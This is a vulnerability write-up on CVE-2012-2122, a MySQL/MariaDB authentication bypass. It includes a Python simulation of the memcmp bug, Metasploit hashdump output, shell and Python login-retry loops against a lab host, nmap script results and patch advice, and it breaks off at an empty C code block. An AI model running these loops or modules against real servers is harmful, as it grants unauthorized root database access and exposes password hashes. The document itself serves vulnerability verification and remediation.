
CVE-2012-2122: MySQL authentication bypass vulnerability and exploitation

I. Vulnerability overview

When a client connects to MariaDB/MySQL, the token it sends (a SHA1 computed over the password and a random scramble string) is compared with the expected value using memcmp(). The int returned by memcmp() was returned through a my_bool (a char), so a non-zero result whose low byte happens to be zero is truncated to 0 and MySQL treats the two passwords as identical. Because the scramble is random, every attempt with a wrong password succeeds with probability about 1/256; as the advisory puts it, roughly one attempt in 256 guesses right. The bug is only exploitable on builds whose memcmp() can return values outside -128..127 (for example the SSE-optimised memcmp in some glibc versions); builds whose memcmp() returns only -1, 0 or 1 contain the same code but are not affected.

Affected products:

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
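To make the comparison bug concrete, the following is an added simulation (not code from the original post or from MySQL/MariaDB) of the mysql_native_password check. The client token and the server-side recovery are the real handshake computations done with hashlib; the 4-byte-word memcmp stand-in, the passwords and the attempt count are assumptions chosen to model a libc memcmp() that returns values outside -128..127. The vulnerable check returns memcmp()'s int through a my_bool (a char), emulated with ctypes.c_byte; the fixed check tests memcmp() != 0 first, as the upstream patch does.

```python
#!/usr/bin/env python3
"""Simulation of the CVE-2012-2122 comparison bug (added example, not code
from the original post or from MySQL/MariaDB)."""
import ctypes
import hashlib
import random

SCRAMBLE_LENGTH = 20   # bytes of random scramble the server sends in the handshake
SHA1_HASH_SIZE = 20


def sha1(data):
    return hashlib.sha1(data).digest()


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash(password):
    """What mysql.user.Password holds for mysql_native_password (minus the '*'
    prefix): SHA1(SHA1(password)), called hash_stage2 in the server code."""
    return sha1(sha1(password))


def client_token(password, scramble):
    """Token the client sends: SHA1(pw) XOR SHA1(scramble || SHA1(SHA1(pw)))."""
    stage1 = sha1(password)
    return xor_bytes(stage1, sha1(scramble + sha1(stage1)))


def wide_memcmp(a, b):
    """Stand-in for an optimised libc memcmp(): compares 4 bytes at a time and
    returns the integer difference of the first mismatching words. Assumption for
    illustration: like the SSE-optimised glibc memcmp the advisory describes, the
    result is NOT confined to -128..127."""
    for i in range(0, len(a), 4):
        wa = int.from_bytes(a[i:i + 4], "little")
        wb = int.from_bytes(b[i:i + 4], "little")
        if wa != wb:
            return wa - wb
    return 0


def as_my_bool(value):
    """Emulate returning a C int through MySQL's my_bool (a char):
    only the low 8 bits survive, so 256, 512, -256 ... all become 0."""
    return ctypes.c_byte(value & 0xFF).value


def recovered_hash(token, scramble, hash_stage2):
    """Server side: undo the XOR to get SHA1(pw), hash it once more; the result
    equals the stored SHA1(SHA1(pw)) only when the password is right."""
    stage1 = xor_bytes(token, sha1(scramble + hash_stage2))
    return sha1(stage1)


def check_scramble_vulnerable(token, scramble, hash_stage2):
    """Pre-fix logic: 'return memcmp(...)' from a my_bool function. 0 = accepted."""
    return as_my_bool(wide_memcmp(hash_stage2, recovered_hash(token, scramble, hash_stage2)))


def check_scramble_fixed(token, scramble, hash_stage2):
    """Post-fix logic (MySQL 5.5.24 / MariaDB 5.5.23): test memcmp() != 0 first."""
    return as_my_bool(wide_memcmp(hash_stage2, recovered_hash(token, scramble, hash_stage2)) != 0)


def count_bypasses(check, attempts, seed=1, real=b"s3cret", guess=b"wrong"):
    """Log in `attempts` times with password `guess`, each against a fresh random
    scramble, and count how often `check` returns 0 (login accepted).
    The passwords and the seed are constructed values for the simulation."""
    rng = random.Random(seed)
    hash_stage2 = stored_hash(real)
    hits = 0
    for _ in range(attempts):
        scramble = rng.getrandbits(8 * SCRAMBLE_LENGTH).to_bytes(SCRAMBLE_LENGTH, "little")
        if check(client_token(guess, scramble), scramble, hash_stage2) == 0:
            hits += 1
    return hits


if __name__ == "__main__":
    n = 65536
    print("vulnerable:", count_bypasses(check_scramble_vulnerable, n), "of", n, "(expect about 256)")
    print("fixed:     ", count_bypasses(check_scramble_fixed, n), "of", n)
```

With the wrong password the vulnerable check accepts about one attempt in 256 (only the low byte of the word difference decides), the fixed check accepts none, and both accept the right password every time. Swap wide_memcmp for one that returns only -1, 0 or 1 and the vulnerable check also accepts nothing: that is exactly why only some builds of the same source were exploitable.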

II. Impact

Anyone who knows a valid username (root almost always exists) can log straight into the database by repeating connection attempts with any password; a few hundred attempts take a fraction of a second.

III. Verification

 1. Metasploit

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > info

       Name: MySQL Authentication Bypass Password Dump
     Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-06-09

Provided by:
  theLightCosine <theLightCosine@metasploit.com>
  jcran <jcran@metasploit.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOSTS                     yes       The target address range or CIDR identifier
  RPORT     3306             yes       The target port (TCP)
  THREADS   1                yes       The number of concurrent threads
  USERNAME  root             yes       The username to authenticate as

Description:
  This module exploits a password bypass vulnerability in MySQL in
  order to extract the usernames and encrypted password hashes from a
  MySQL server. These hashes are stored as loot for later cracking.

References:
  https://cvedetails.com/cve/CVE-2012-2122/
  OSVDB (82804)
  https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 192.168.118.130
RHOSTS => 192.168.118.130
msf auxiliary(mysql_authbypass_hashdump) > run

[+] 192.168.118.130:3306  - 192.168.118.130:3306 The server allows logins, proceeding with bypass test
[*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 10% complete
[*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 20% complete
[*] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully bypassed authentication after 207 attempts. URI: mysql://root:iTk@192.168.118.130:3306
[+] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] 192.168.118.130:3306  - 192.168.118.130:3306 Hash Table has been saved: /root/.msf4/loot/20180829155507_default_192.168.118.130_mysql.hashes_835663.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_authbypass_hashdump) >

 2. Linux shell

root@kali:~# for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.118.130 ; done
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
[the same "Access denied" line repeats once per rejected attempt]
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 1513
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> select version();
+-----------+
| version() |
+-----------+
| 5.5.23    |
+-----------+
1 row in set (0.00 sec)

MySQL [(none)]>

Two things to read from this output. "Welcome to the MariaDB monitor" comes from the Kali client, not from the target: the server banner is "5.5.23 Source distribution", and the nmap scan further down fingerprints it as MySQL 5.5.23, which is inside the vulnerable range (MySQL fixed the bug in 5.5.24, whereas MariaDB 5.5.23 is already fixed). Also, because no -e query is given, the successful attempt drops into an interactive session, and the loop carries on with the remaining attempts once you quit it.

 3. Python

The script simply calls subprocess.Popen in an endless loop to run the mysql client command:

#!/usr/bin/python
import subprocess

# Re-run the mysql client with a wrong password until the server accepts one.
# The loop never ends on its own, and because "mysql" selects that database,
# a successful attempt lands in an interactive session on the target.
while 1:
    subprocess.Popen("mysql -h 192.168.118.130 -u root mysql --password=blah", shell=True).wait()

 

Execution:

root@kali:~# python test.py
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
[the same "Access denied" line repeats once per rejected attempt]
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 2697
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [mysql]>
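The shell loop and the Python script above both run the interactive client, so a successful attempt leaves you sitting in a mysql prompt and the loop keeps going after you leave it. As an added example (not code from the original post), the following variant runs the client non-interactively with -e and a connect timeout, stops at the first success and reports the attempt number, which is itself the evidence: a patched server never succeeds, and probability_of_detection() tells you how many attempts give confidence. The host, user and password are constructed values; try_login() expects a mysql client on PATH and a reachable target, while probe() can be exercised with any callable.

```python
#!/usr/bin/env python3
"""Bounded, non-interactive CVE-2012-2122 probe (added example, not from the
original post). Assumes the mysql (or MariaDB) command-line client is on PATH."""
import subprocess
import sys


def try_login(host, user, password, port=3306, timeout=5):
    """One connection attempt with the mysql CLI. Returns True when the server
    accepted the password: ERROR 1045 makes the client exit non-zero, while a
    successful 'SELECT 1' exits 0 and never opens an interactive prompt."""
    cmd = [
        "mysql", "-h", host, "-P", str(port), "-u", user,
        "--password=" + password, "--connect-timeout=" + str(timeout),
        "-e", "SELECT 1",
    ]
    try:
        proc = subprocess.run(cmd, capture_output=True, timeout=timeout + 5)
    except subprocess.TimeoutExpired:
        return False
    return proc.returncode == 0


def probe(attempt, max_attempts=1000):
    """Call attempt() until it returns True. Returns the 1-based attempt number
    on success, or None when the limit is reached. A vulnerable build succeeds
    with probability about 1/256 per attempt, a fixed build never does."""
    for n in range(1, max_attempts + 1):
        if attempt():
            return n
    return None


def probability_of_detection(max_attempts, p=1 / 256):
    """Chance that a vulnerable server is caught within max_attempts attempts,
    i.e. 1 - (1 - p) ** max_attempts; ~63% at 256 attempts, ~98% at 1000."""
    return 1 - (1 - p) ** max_attempts


if __name__ == "__main__":
    # Constructed target values; override the host on the command line.
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.118.130"
    n = probe(lambda: try_login(host, "root", "wrong"))
    if n is None:
        print("no bypass in 1000 attempts (%.1f%% detection): probably patched"
              % (100 * probability_of_detection(1000)))
    else:
        print("authentication bypassed after %d attempts: VULNERABLE" % n)
```

Keep max_attempts in proportion to the server's connection rate: 1000 attempts already gives about 98% detection on a vulnerable build, and every one of them is an "Access denied" event in the target's error log, which is also what a defender should be alerting on.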

4. nmap script (mysql-vuln-cve2012-2122):

root@kali:~# nmap -sV -T4 -p3306 --script=mysql-vuln-cve2012-2122 192.168.118.130

Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:07 CST
Nmap scan report for bogon (192.168.118.130)
Host is up (0.00033s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.5.23
| mysql-vuln-cve2012-2122: 
|   VULNERABLE:
|   Authentication bypass in MySQL servers.
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2012-2122
|       When a user connects to MariaDB/MySQL, a token (SHA
|       over a password and a random scramble string) is calculated and compared
|       with the expected value. Because of incorrect casting, it might've
|       happened that the token and the expected value were considered equal,
|       even if the memcmp() returned a non-zero value. In this case
|       MySQL/MariaDB would think that the password is correct, even while it is
|       not.  Because the protocol uses random strings, the probability of
|       hitting this bug is about 1/256.
|       Which means, if one knows a user name to connect (and "root" almost
|       always exists), she can connect using *any* password by repeating
|       connection attempts. ~300 attempts takes only a fraction of second, so
|       basically account password protection is as good as nonexistent.
|       
|     Disclosure date: 2012-06-9
|     Extra information:
|       Server granted access at iteration #1500
|       
|   root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
|       
|     References:
|       http://seclists.org/oss-sec/2012/q2/493
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
|_      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
MAC Address: 00:0C:29:25:90:3B (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Use the -d option to view debug information; the detailed output is as follows:

root@kali:~# nmap -sV -T4 -p3306 -d --script=mysql-vuln-cve2012-2122 192.168.118.130

Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:13 CST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 500, min 100, max 1250
  max-scan-delay: TCP 10, UDP 1000, SCTP 10
  parallelism: min 0, max 0
  max-retries: 6, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.3.
NSE: Arguments from CLI: 
NSE: Loaded 41 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Initiating ARP Ping Scan at 16:13
Scanning 192.168.118.130 [1 port]
Packet capture filter (device eth0): arp and arp[18:4] = 0x000C29A8 and arp[22:2] = 0x84F5
Completed ARP Ping Scan at 16:13, 0.03s elapsed (1 total hosts)
Overall sending rates: 29.01 packets / s, 1218.42 bytes / s.
mass_rdns: Using DNS server 192.168.118.2
Initiating Parallel DNS resolution of 1 host. at 16:13
mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:13
Scanning bogon (192.168.118.130) [1 port]
Packet capture filter (device eth0): dst host 192.168.118.128 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.118.130)))
Discovered open port 3306/tcp on 192.168.118.130
Completed SYN Stealth Scan at 16:13, 0.04s elapsed (1 total ports)
Overall sending rates: 23.44 packets / s, 1031.36 bytes / s.
Initiating Service scan at 16:13
Scanning 1 service on bogon (192.168.118.130)
Completed Service scan at 16:13, 0.00s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.118.130.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:13
NSE: Starting mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #1
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #2
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #3
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #4
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #5
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #6
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #7
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #8
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #9
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #10
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #11
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #12
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #13
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #14
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #15
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #16
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #17
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #18
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #19
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #20
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #21
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #22
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #23
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #24
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #25
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #26
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #27
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #28
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #29
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #30
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #31
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #32
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #33
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #34
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #35
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #36
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #37
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #38
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #39
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #40
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #41
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #42
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #43
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #44
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #45
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #46
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #47
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #48
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #49
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #50
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #51
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #52
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #53
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #54
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #55
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #56
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #57
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #58
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #59
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #60
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #61
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #62
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #63
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #64
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #65
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #66
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #67
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #68
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #69
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #70
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #71
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #72
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #73
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #74
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #75
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #76
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #77
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #78
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #79
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #80
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #81
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #82
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #83
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #84
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #85
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #86
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #87
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #88
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #89
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #90
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #91
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #92
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #93
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #94
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #95
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #96
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #97
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #98
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #99
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #100
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #101
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #102
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #103
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #104
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #105
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #106
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #107
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #108
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #109
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #110
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #111
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #112
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #113
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #114
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #115
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #116
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #117
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #118
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #119
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #120
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #121
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #122
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #123
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #124
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #125
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #126
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #127
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #128
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #129
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #130
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #131
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #132
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #133
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #134
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #135
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #136
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #137
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #138
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #139
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #140
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #141
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #142
NSE: Finished mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
Completed NSE at 16:13, 0.42s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Nmap scan report for bogon (192.168.118.130)
Host is up, received arp-response (0.00068s latency).
Scanned at 2018-08-29 16:13:26 CST for 1s

PORT     STATE SERVICE REASON         VERSION
3306/tcp open  mysql   syn-ack ttl 63 MySQL 5.5.23
| mysql-vuln-cve2012-2122: 
|   VULNERABLE:
|   Authentication bypass in MySQL servers.
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2012-2122
|       When a user connects to MariaDB/MySQL, a token (SHA
|       over a password and a random scramble string) is calculated and compared
|       with the expected value. Because of incorrect casting, it might've
|       happened that the token and the expected value were considered equal,
|       even if the memcmp() returned a non-zero value. In this case
|       MySQL/MariaDB would think that the password is correct, even while it is
|       not.  Because the protocol uses random strings, the probability of
|       hitting this bug is about 1/256.
|       Which means, if one knows a user name to connect (and "root" almost
|       always exists), she can connect using *any* password by repeating
|       connection attempts. ~300 attempts takes only a fraction of second, so
|       basically account password protection is as good as nonexistent.
|       
|     Disclosure date: 2012-06-9
|     Extra information:
|       Server granted access at iteration #1500
|       
|   root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
|       
|     References:
|       http://seclists.org/oss-sec/2012/q2/493
|       https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
MAC Address: 00:0C:29:25:90:3B (VMware)
Final times for host: srtt: 677 rttvar: 3967  to: 100000
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@kali:~# 

IV. Remediation recommendations

Upgrade to the official patched releases:
MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23
MySQL 5.1.63, 5.5.24, 5.6.6
Temporary workaround (from Sebug):
Block the MySQL port at the firewall.
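The patched releases listed above correct the comparison that the nmap script output describes: memcmp() returns an int, and the vulnerable code narrowed that int to a one-byte type before testing it, so a return value such as 256 was truncated to 0 and read as a match, which is where the roughly 1/256 success rate comes from. The following C program is an added illustration, not MySQL's code: wide_memcmp() is a constructed stand-in for a word-at-a-time memcmp, and check_scramble_vulnerable() and check_scramble_fixed() are hypothetical names that mirror the shape of the bug and of its fix.

```c
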